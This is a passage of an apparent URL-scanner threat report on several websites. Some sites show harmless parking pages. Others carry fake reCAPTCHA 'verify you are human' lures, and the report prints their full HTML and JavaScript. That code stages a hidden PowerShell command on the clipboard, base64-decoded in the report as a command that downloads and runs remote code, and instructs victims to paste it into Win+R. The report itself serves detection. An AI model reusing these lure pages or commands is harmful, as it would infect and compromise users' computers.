document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://first-security-verden.de/
Total findings: 5
Indicators of Compromise
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://first-security-verden.de/",
"URLs": [
"https://www.webgo.de/assets/images/misc/hazard-50x50.png",
"https://www.webgo.de/assets/images/misc/hazard-50x50.png",
"https://www.webgo.de/assets/images/logo.svg",
"https://www.webgo.de/assets/images/misc/construction.png",
"https://www.webgo.de/webhosting/"
],
"HTML": "<html>\r\n<head>\r\n \r\n<title>Neue Domain bei der webgo GmbH</title>\r\n<style type=\"text/css\">\r\n \r\nbody {font-family: sans-serif;}\r\n \r\n.main {\r\nbackground: #ffffff; /* Old browsers */\r\nbackground: -moz-linear-gradient(top, #ffffff 0%, #e5e5e5 100%); /* FF3.6+ */\r\nbackground: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ffffff), color-stop(100%,#e5e5e5)); /* Chrome,Safari4+ */\r\nbackground: -webkit-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* Chrome10+,Safari5.1+ */\r\nbackground: -o-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* Opera 11.10+ */\r\nbackground: -ms-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* IE10+ */\r\nbackground: linear-gradient(to bottom, #ffffff 0%,#e5e5e5 100%); /* W3C */\r\nheight: 540px;\r\nwidth: 1200px;\r\npadding: 20px;\r\nmargin: 30px auto;\r\n box-shadow: 0px 0 5px #555;\r\n \r\n}\r\n \r\n.hazard {background-image: url(\"https://www.webgo.de/assets/images/misc/hazard-50x50.png\"); width: 1240px; height: 10px; margin: 20px -20px -30px -20px;}\r\n.hazard2 {background-image: url(\"https://www.webgo.de/assets/images/misc/hazard-50x50.png\"); width: 1240px; height: 10px; margin: 20px -20px -30px -20px; position: relative; top: 140px;}\r\n \r\n.header {\r\n width: 100%;\r\n height: 68px;\r\n background-image: url(\"https://www.webgo.de/assets/images/logo.svg\");\r\n background-repeat:no-repeat;\r\n}\r\n.content {\r\nmargin: 20px 0 0 -20px;\r\nbox-shadow: 0px 0 0px #555;\r\nwidth: 100%;\r\nheight: 200px;\r\npadding: 20px;\r\nfont-size: 1.5em;\r\n \r\n}\r\n.footer {\r\n height: 32px;\r\n padding: 10px 0 0 0;\r\n position: relative;\r\n top:-90px;\r\n}\r\n</style>\r\n</head>\r\n<body>\r\n<div class=\"main\">\r\n <div class=\"header\"></div>\r\n <div class=\"hazard\"></div>\r\n <div class=\"content\">\r\n <div style=\"width: 50%; float: left;position: relative; top: 50px;\">Diese Domain wurde bei webgo f\u00fcr einen Kunden registriert. <br><br>Wenn Sie diese Seite sehen, ist Ihre Domain erreichbar. Im webgo Webspace Admin unter \"Paket-Verwaltung\" - \"Domainverwaltung\" sehen Sie, in welchen Ordner Ihre Domain aktuell zeigt. </div>\r\n <div style=\"width: 50%; float: left; position: relative; top: -128px;\"><center><img src=\"https://www.webgo.de/assets/images/misc/construction.png\"></center></div>\r\n </div>\r\n <div class=\"hazard2\"></div>\r\n <div class=\"footer\">Sollten Sie Inhaber dieser Domain sein, l\u00f6schen Sie diese <b>index.html</b> Datei, damit Ihre hochgeladene Seite angezeigt werden kann. <br>\r\n <span style=\"font-size: 0.7em; float: right; margin: -7px 0 0 0\"><a href=\"https://www.webgo.de/webhosting/\">Webhosting von webgo GmbH </a></span></div>\r\n </div>\r\n \r\n</body>\r\n</html>\n",
"ThreatLevel": "None"
}
https://lucprofessional.com.br/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://lucprofessional.com.br/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://www.first-security-verden.de/
Total findings: 5
Indicators of Compromise
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://www.first-security-verden.de/",
"URLs": [
"https://www.webgo.de/assets/images/misc/hazard-50x50.png",
"https://www.webgo.de/assets/images/misc/hazard-50x50.png",
"https://www.webgo.de/assets/images/logo.svg",
"https://www.webgo.de/assets/images/misc/construction.png",
"https://www.webgo.de/webhosting/"
],
"HTML": "<html>\r\n<head>\r\n \r\n<title>Neue Domain bei der webgo GmbH</title>\r\n<style type=\"text/css\">\r\n \r\nbody {font-family: sans-serif;}\r\n \r\n.main {\r\nbackground: #ffffff; /* Old browsers */\r\nbackground: -moz-linear-gradient(top, #ffffff 0%, #e5e5e5 100%); /* FF3.6+ */\r\nbackground: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ffffff), color-stop(100%,#e5e5e5)); /* Chrome,Safari4+ */\r\nbackground: -webkit-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* Chrome10+,Safari5.1+ */\r\nbackground: -o-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* Opera 11.10+ */\r\nbackground: -ms-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* IE10+ */\r\nbackground: linear-gradient(to bottom, #ffffff 0%,#e5e5e5 100%); /* W3C */\r\nheight: 540px;\r\nwidth: 1200px;\r\npadding: 20px;\r\nmargin: 30px auto;\r\n box-shadow: 0px 0 5px #555;\r\n \r\n}\r\n \r\n.hazard {background-image: url(\"https://www.webgo.de/assets/images/misc/hazard-50x50.png\"); width: 1240px; height: 10px; margin: 20px -20px -30px -20px;}\r\n.hazard2 {background-image: url(\"https://www.webgo.de/assets/images/misc/hazard-50x50.png\"); width: 1240px; height: 10px; margin: 20px -20px -30px -20px; position: relative; top: 140px;}\r\n \r\n.header {\r\n width: 100%;\r\n height: 68px;\r\n background-image: url(\"https://www.webgo.de/assets/images/logo.svg\");\r\n background-repeat:no-repeat;\r\n}\r\n.content {\r\nmargin: 20px 0 0 -20px;\r\nbox-shadow: 0px 0 0px #555;\r\nwidth: 100%;\r\nheight: 200px;\r\npadding: 20px;\r\nfont-size: 1.5em;\r\n \r\n}\r\n.footer {\r\n height: 32px;\r\n padding: 10px 0 0 0;\r\n position: relative;\r\n top:-90px;\r\n}\r\n</style>\r\n</head>\r\n<body>\r\n<div class=\"main\">\r\n <div class=\"header\"></div>\r\n <div class=\"hazard\"></div>\r\n <div class=\"content\">\r\n <div style=\"width: 50%; float: left;position: relative; top: 50px;\">Diese Domain wurde bei webgo f\u00fcr einen Kunden registriert. <br><br>Wenn Sie diese Seite sehen, ist Ihre Domain erreichbar. Im webgo Webspace Admin unter \"Paket-Verwaltung\" - \"Domainverwaltung\" sehen Sie, in welchen Ordner Ihre Domain aktuell zeigt. </div>\r\n <div style=\"width: 50%; float: left; position: relative; top: -128px;\"><center><img src=\"https://www.webgo.de/assets/images/misc/construction.png\"></center></div>\r\n </div>\r\n <div class=\"hazard2\"></div>\r\n <div class=\"footer\">Sollten Sie Inhaber dieser Domain sein, l\u00f6schen Sie diese <b>index.html</b> Datei, damit Ihre hochgeladene Seite angezeigt werden kann. <br>\r\n <span style=\"font-size: 0.7em; float: right; margin: -7px 0 0 0\"><a href=\"https://www.webgo.de/webhosting/\">Webhosting von webgo GmbH </a></span></div>\r\n </div>\r\n \r\n</body>\r\n</html>\n",
"ThreatLevel": "None"
}
https://www.laborpartyjo.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://www.laborpartyjo.com/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n 